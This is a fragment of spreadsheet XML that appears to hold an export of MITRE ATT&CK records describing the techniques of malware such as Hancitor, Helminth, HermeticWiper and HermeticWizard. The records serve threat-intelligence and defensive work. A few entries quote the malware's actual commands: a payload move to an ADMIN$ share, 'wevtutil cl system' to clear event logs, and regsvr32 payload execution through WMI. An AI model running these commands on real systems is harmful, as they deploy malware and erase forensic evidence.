  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070)'s code may be obfuscated through structured exception handling and return-oriented programming.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--291b7fbf-5b5f-460a-8009-cadb383b3262</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</si>
  <si>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</si>
  <si>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relationship--259b878f-147e-443b-8360-aabc00cf6d73</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) has used HTTP and HTTPS for command and control.(Citation: Dell TG-3390)(Citation: ThreatStream Evasion Analysis)</t>
  </si>
  <si>
    <t>relationship--b052a076-6d4e-49f5-95ac-16264ef05b1d</t>
  </si>
  <si>
    <t>[HTTPBrowser](https://attack.mitre.org/software/S0070) is capable of spawning a reverse shell on a victim.(Citation: Dell TG-3390)</t>
  </si>
  <si>
    <t>relationship--380db9ad-f6ad-4988-8a28-b773313f07b7</t>
  </si>
  <si>
    <t>S0047</t>
  </si>
  <si>
    <t>Hacking Team UEFI Rootkit</t>
  </si>
  <si>
    <t>malware--4b62ab58-c23b-4704-9c15-edd568cd59f8</t>
  </si>
  <si>
    <t>[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI)</t>
  </si>
  <si>
    <t>relationship--89433640-bf49-48b3-9f26-76423cd36f77</t>
  </si>
  <si>
    <t xml:space="preserve">[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.(Citation: TrendMicro Hacking Team UEFI) </t>
  </si>
  <si>
    <t>relationship--aeea094c-6ea6-4b32-b723-bb475cf42681</t>
  </si>
  <si>
    <t>S0499</t>
  </si>
  <si>
    <t>Hancitor</t>
  </si>
  <si>
    <t>malware--ef2247bf-8062-404b-894f-d65d00564817</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</si>
  <si>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</si>
  <si>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relationship--ffecf9e6-6966-4535-934f-4fd4696875b0</t>
  </si>
  <si>
    <t>02 September 2020</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has deleted files using the VBA &lt;code&gt;kill&lt;/code&gt; function.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>relationship--f58a02ed-055f-461f-bfdf-067f07310423</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has the ability to download additional files from C2.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>relationship--3d902953-306b-48d4-be7b-f08030ecb62e</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used malicious Microsoft Word documents, sent via email, which prompted the victim to enable macros.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>relationship--1d56986b-e6fd-4624-87b4-5e0dd9f05c2f</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has relied upon users clicking on a malicious link delivered through phishing.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>relationship--471304cd-f98a-49f7-a33e-2d69ab6c8a47</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used &lt;code&gt;CallWindowProc&lt;/code&gt; and &lt;code&gt;EnumResourceTypesA&lt;/code&gt; to interpret and execute shellcode.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>relationship--51fb8815-6f59-46ff-8f7a-98025623db76</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used Base64 to encode malicious links. [Hancitor](https://attack.mitre.org/software/S0499) has also delivered compressed payloads in ZIP files to victims.(Citation: Threatpost Hancitor)(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>relationship--c8fb4459-4352-4ee6-bfaf-a97be333bf64</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used PowerShell to execute commands.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>relationship--5a54aabe-e485-4a01-b284-cb080b11582b</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499)  has added Registry Run keys to establish persistence.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>relationship--57c700c6-e301-4433-84bd-722934f9d922</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails with malicious attachments.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>relationship--554fbee8-58a9-4557-bf49-f1df2c5da442</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails which contained malicious links.(Citation: Threatpost Hancitor)</t>
  </si>
  <si>
    <t>relationship--c1b55dea-5e5d-4cff-bfac-5880507389c1</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used verclsid.exe to download and execute a malicious script.(Citation: Red Canary Verclsid.exe)</t>
  </si>
  <si>
    <t>relationship--331c41dc-7452-4328-a370-7556f659e8cb</t>
  </si>
  <si>
    <t>[Hancitor](https://attack.mitre.org/software/S0499) has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.(Citation: FireEye Hancitor)</t>
  </si>
  <si>
    <t>relationship--f60f8552-3c43-4b43-ad23-2b00b6172b00</t>
  </si>
  <si>
    <t>[Havij](https://attack.mitre.org/software/S0224) is used to automate SQL injection.(Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>relationship--ced175fd-1f27-44cb-8d7f-44277b1754e4</t>
  </si>
  <si>
    <t>A [Helminth](https://attack.mitre.org/software/S0170) VBScript receives a batch script to execute a set of commands in a command prompt.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--cd58d271-9ee2-45d6-9ca3-22ae8da639b5</t>
  </si>
  <si>
    <t>The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log clipboard contents.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--a58983e1-45d7-4b45-a578-307659a619dc</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.(Citation: ClearSky OilRig Jan 2017)</t>
  </si>
  <si>
    <t>relationship--259a5116-2492-4d7b-b300-1cf9b8c79f00</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can use DNS for C2.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--39689be2-bc35-4d89-9233-08bda52a4229</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--f81274dc-2f5b-47f7-b91f-70a4ebdfde95</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</si>
  <si>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</si>
  <si>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relationship--c2541365-58bd-474c-82ab-28c7b63e7fb8</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can download additional files.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--86b2980a-dd9f-4553-8f65-69f75f0f4332</t>
  </si>
  <si>
    <t>The executable version of [Helminth](https://attack.mitre.org/software/S0170) has a module to log keystrokes.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--699ac754-3f3e-46de-9b2a-5ea450ef47fd</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) creates folders to store output from batch scripts prior to sending the information to its C2 server.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--9c7ecbf4-88fe-4144-8dc4-f5bca2c3156d</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has checked the local administrators group.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--b3981ca6-7ef0-4625-99a8-9cbec731bac9</t>
  </si>
  <si>
    <t>The [Helminth](https://attack.mitre.org/software/S0170) config file is encrypted with RC4.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--284d622d-8b28-4569-97a7-936edced1b18</t>
  </si>
  <si>
    <t>One version of [Helminth](https://attack.mitre.org/software/S0170) uses a PowerShell script.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--5b69fc3c-1bf7-4092-be94-755790ccf41f</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has used [Tasklist](https://attack.mitre.org/software/S0057) to get information on processes.(Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>relationship--5bb90849-cdfe-4cc0-9ca3-128f17b2a1d1</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut in the Start Menu folder.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--2a7cd52f-46e5-4a18-bdf6-4c38edfcb97c</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) has used a scheduled task for persistence.(Citation: ClearSky OilRig Jan 2017)</t>
  </si>
  <si>
    <t>relationship--09266cb7-26b3-4959-bcff-a91e309b5588</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) establishes persistence by creating a shortcut.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--3537c31f-bd6f-4cad-97ac-4ec3d8a9478b</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</si>
  <si>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</si>
  <si>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relationship--e68ff1c2-ef03-486b-96df-167a1652a97b</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) encrypts data sent to its C2 server over HTTP with RC4.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--2d8cdbf3-1be2-4e64-ba18-f8b65fcbae8f</t>
  </si>
  <si>
    <t>One version of [Helminth](https://attack.mitre.org/software/S0170) consists of VBScript scripts.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--610fcccc-c03a-4bd1-8f86-95802fe33cba</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can use HTTP for C2.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--49c7a467-98ce-4764-af86-c950ed951d13</t>
  </si>
  <si>
    <t>[Helminth](https://attack.mitre.org/software/S0170) can provide a remote shell. One version of [Helminth](https://attack.mitre.org/software/S0170) uses batch scripting.(Citation: Palo Alto OilRig May 2016)</t>
  </si>
  <si>
    <t>relationship--acca43ee-1e88-4d39-a953-7626173a89b2</t>
  </si>
  <si>
    <t>S0697</t>
  </si>
  <si>
    <t>HermeticWiper</t>
  </si>
  <si>
    <t>malware--a0ab8a96-40c9-4483-8a54-3fafa6d6007a</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</si>
  <si>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</si>
  <si>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relationship--2a41b67c-60d5-4784-a5a8-99a60a3f9202</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can overwrite the `C:\Windows\System32\winevt\Logs` file on a targeted system.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--f295f6a5-914a-4699-ae82-0607c6d81a0d</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</si>
  <si>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</si>
  <si>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relationship--415f38f8-d490-461a-9a40-968f8cd2bd8b</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</si>
  <si>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</si>
  <si>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relationship--40ad3b2e-e88c-43a2-82c5-666e8ae568e4</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can decompress and copy driver files using `LZCopy`.(Citation: Crowdstrike DriveSlayer February 2022)</t>
  </si>
  <si>
    <t>relationship--8580c1e0-84fd-4da9-a9e8-1ae17f1b67d2</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to corrupt disk partitions and obtain raw disk access to destroy data.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: SentinelOne Hermetic Wiper February 2022)</t>
  </si>
  <si>
    <t>relationship--d687171f-152f-4211-95bb-e051dc61575f</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</si>
  <si>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</si>
  <si>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relationship--6a8db293-43a2-45a1-b9b2-32222355bc4e</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to overwrite its own file with random bites.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--d02e8b78-69e7-4c70-bab1-a5bec9f94a9a</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can enumerate common folders such as My Documents, Desktop, and AppData.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>relationship--6435a96b-f3b5-4a16-876f-901650257d36</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to deploy through an infected system's default domain policy.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--2b7d386f-57b6-4ed2-a5bf-bcc20c92c95b</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</si>
  <si>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</si>
  <si>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relationship--03c1479b-bbe6-4f21-bb56-133b4f7eb16a</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--42d6cd7c-a512-4fb9-a625-d21152b60f22</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can disable the VSS service on a compromised host using the service control manager.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>relationship--6ac34520-de4a-4033-92a4-52d7463592b9</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has used the name `postgressql.exe` to mask a malicious payload.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--abc4fb0a-cd49-438e-84bb-7000fbe48b1c</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</si>
  <si>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</si>
  <si>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relationship--41de9761-477c-4674-aea7-64a0b0b4ab4b</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</si>
  <si>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</si>
  <si>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relationship--916e5e5c-7856-47e7-9749-58621671d158</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm.(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>relationship--a2acfa7e-4ba4-42e0-ae13-068c17d7d7fa</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to use scheduled tasks for execution.(Citation: Symantec Ukraine Wipers February 2022)</t>
  </si>
  <si>
    <t>relationship--0e35d2ce-3af7-4645-b795-382a75d62fb9</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can create system services to aid in executing the payload.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>relationship--db85221a-3d34-4e8d-bcb1-95b507617b84</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to stop the Volume Shadow Copy service.(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>relationship--d4ac896d-31ac-4c4a-a4d5-3134e6bd8622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</si>
  <si>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</si>
  <si>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relationship--87a01c6d-b7a3-481f-82a9-5dee8c6f91db</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can initiate a system shutdown.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022)</t>
  </si>
  <si>
    <t>relationship--f86b3fe5-c004-4fed-aaac-cf7d68b8d315</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host.(Citation: Crowdstrike DriveSlayer February 2022)</t>
  </si>
  <si>
    <t>relationship--6c56fdb0-d6cc-4a25-aa19-7191410704ef</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can use `cmd.exe /Q/c move CSIDL_SYSTEM_DRIVE\temp\sys.tmp1 CSIDL_WINDOWS\policydefinitions\postgresql.exe 1&gt; \\127.0.0.1\ADMIN$\_1636727589.6007507 2&gt;&amp;1` to deploy on an infected system.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--86e5bf16-825f-46d0-a590-57c134dd0b9a</t>
  </si>
  <si>
    <t>[HermeticWiper](https://attack.mitre.org/software/S0697) can load drivers by creating a new service using the `CreateServiceW` API.(Citation: Crowdstrike DriveSlayer February 2022)</t>
  </si>
  <si>
    <t>relationship--cd78a407-3770-4806-8b06-13b7f7ccc2cf</t>
  </si>
  <si>
    <t>S0698</t>
  </si>
  <si>
    <t>HermeticWizard</t>
  </si>
  <si>
    <t>malware--ff7ed9c1-dca3-4e62-9da6-72c5d388b8fa</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to use `wevtutil cl system` to clear event logs.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--7e6ebf2b-26f1-4bba-8f7e-619ffb14a649</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has been signed by valid certificates assigned to Hermetica Digital.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--1e60c0b8-854b-4d2e-a77b-ed98f3cc4e66</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can execute files on remote machines using DCOM.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--b5468863-0a1f-433a-99d6-8f94765107fc</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can copy files to other machines on a compromised network.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--a8fb73d8-e4c0-4f3f-86e7-a13768fae22b</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has been named `exec_32.dll` to mimic a legitimate MS Outlook .dll.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--47d25590-2bcb-4acf-81ac-24d7ef23db91</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can connect to remote shares using `WNetAddConnection2W`.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--8ff9263a-c32c-4fcf-b20b-9da4647baf99</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to scan ports on a compromised network.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--a8aec030-1331-46d8-afa3-d08be70f55c0</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to encrypt PE files with a reverse XOR loop.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--dc6fcf08-c160-412e-be5e-3b669d43762a</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use a list of hardcoded credentials in attempt to authenticate to SMB shares.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--801fa89f-8114-492f-9748-85187190ea86</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has used `regsvr32.exe /s /i` to execute malicious payloads.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--b2b37e14-5dbc-4faa-955a-7172b242e828</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</si>
  <si>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</si>
  <si>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relationship--9006e828-f70a-4c7e-8dce-07d1040de3e9</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) has the ability to create a new process using `rundll32`.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--dde93711-fffc-4426-8e23-7de234278302</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--0feab3d1-4d0d-4543-bbc1-63505eda12f8</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use `OpenRemoteServiceManager` to create a service.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--29c9b21f-7ea0-48f0-bd90-978d4f37813f</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use `cmd.exe` for execution on compromised hosts.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--131ac47f-f346-4d49-8c59-f252684b0281</t>
  </si>
  <si>
    <t>[HermeticWizard](https://attack.mitre.org/software/S0698) can use WMI to create a new process on a remote machine via `C:\windows\system32\cmd.exe /c start C:\windows\system32\\regsvr32.exe /s /iC:\windows\&lt;filename&gt;.dll`.(Citation: ESET Hermetic Wizard March 2022)</t>
  </si>
  <si>
    <t>relationship--92b7c137-0317-44fa-b1b7-8a7f3ceb6da6</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use DNS tunneling for C2 communications.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--66bac3e2-3a04-4ad0-8f38-fa952e7289c6</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can decrypt its payload prior to execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--52893247-a6d6-4119-881a-09e10121edf5</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can inject a DLL into rundll32.exe for execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--063ed9e5-4acd-47b4-a169-0ca40ef95025</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has the ability to delete folders and files from a targeted system.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--07fd0d2b-867b-4b9a-bf7a-e2c0dfe60079</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has the ability to search the compromised host for files.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--9d28bf78-0fde-4efd-85b2-fc1960f1b386</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has been spread through malicious document lures.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--f56f129e-0a30-4be0-bc4b-5942a479e0f9</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) has been named `srvdll.dll` to appear as a legitimate service.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--f49c7cda-92f7-425b-b371-35ef14d0375d</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can encrypt its payload.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--b52fd457-405d-4cc3-b1f7-141ab6fbf04a</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can identify removable media attached to victim's machines.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--de727da1-d36f-4e33-99a1-05ce2df29094</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can gather process information.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--753edd67-e4bb-4c1c-96bf-4de16c270d8c</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--19539764-3fe2-42c1-bf25-9e61c21469b4</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can establish persistence with the auto start function including using the value `EverNoteTrayUService`.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--b26fc06b-507b-4fbd-bf07-b4e880ac85ab</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can use rundll32.exe to gain execution.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--768dd2dd-8840-45e3-ad15-c30512a35c05</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can enumerate drives on a compromised host.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--69262212-bb89-43fc-8a80-ba492766e372</t>
  </si>
  <si>
    <t>[Heyoka Backdoor](https://attack.mitre.org/software/S1027) can check if it is running as a service on a compromised host.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>relationship--6b68eccb-bb48-40fd-bf3e-4bc60a51a8e1</t>
  </si>
  <si>
    <t>S0087</t>
  </si>
  <si>
    <t>Hi-Zor</t>
  </si>
  <si>
    <t>malware--5967cc93-57c9-404a-8ffd-097edfa7bdfc</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with TLS.(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>relationship--a5d7526f-2b1f-4a69-abc7-926b22bc402b</t>
  </si>
  <si>
    <t>29 April 2020</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) deletes its RAT installer file as it executes its DLL payload file.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>relationship--66bec558-ff92-42ff-a8c1-5b47d071d606</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) has the ability to upload and download files from its C2 server.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>relationship--18572125-3439-4f7c-92c8-d787913dc989</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) uses various XOR techniques to obfuscate its components.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>relationship--d0d74930-6b1d-4d1d-ba7f-60b93c114fd9</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) creates a Registry Run key to establish persistence.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>relationship--4f08676f-51c1-4cb5-94a7-08922e4886c6</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) executes using regsvr32.exe called from the [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) persistence mechanism.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>relationship--ecb0d858-dd15-4181-b15b-76459db1d294</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with a double XOR using two distinct single-byte keys.(Citation: Fidelis Hi-Zor)</t>
  </si>
  <si>
    <t>relationship--34e9fc0a-75b9-4100-91ef-30ca3225958a</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) communicates with its C2 server over HTTPS.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>relationship--27a64a3a-62cb-4c1b-adfc-5070e2f1e744</t>
  </si>
  <si>
    <t>[Hi-Zor](https://attack.mitre.org/software/S0087) has the ability to create a reverse shell.(Citation: Fidelis INOCNATION)</t>
  </si>
  <si>
    <t>relationship--aaca7907-7a43-4ebb-bd2b-bf7f497d9134</t>
  </si>
  <si>
    <t>S0394</t>
  </si>
  <si>
    <t>HiddenWasp</t>
  </si>
  <si>
    <t>malware--fc774af4-533b-4724-96d2-ac1026316794</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) uses a cipher to implement a decoding function.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--b6df63b7-34af-4918-8d1d-cf3dad0287f8</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) adds itself as a shared object to the LD_PRELOAD environment variable.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--5a4c3eb5-9ea2-4e7d-ae9d-d4f0a45c4803</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) downloads a tar compressed archive from a download server to the system.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--bf66a7c4-7d72-4769-a96a-83d3363fa7a9</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) creates a user account as a means to provide initial persistence to the compromised machine.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--08d9bd35-4d07-42f0-b462-c9c8b5a9dbab</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) communicates with a simple network protocol over TCP.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>relationship--55b8f35b-7ccc-4da7-9ab1-40fe148cd182</t>
  </si>
  <si>
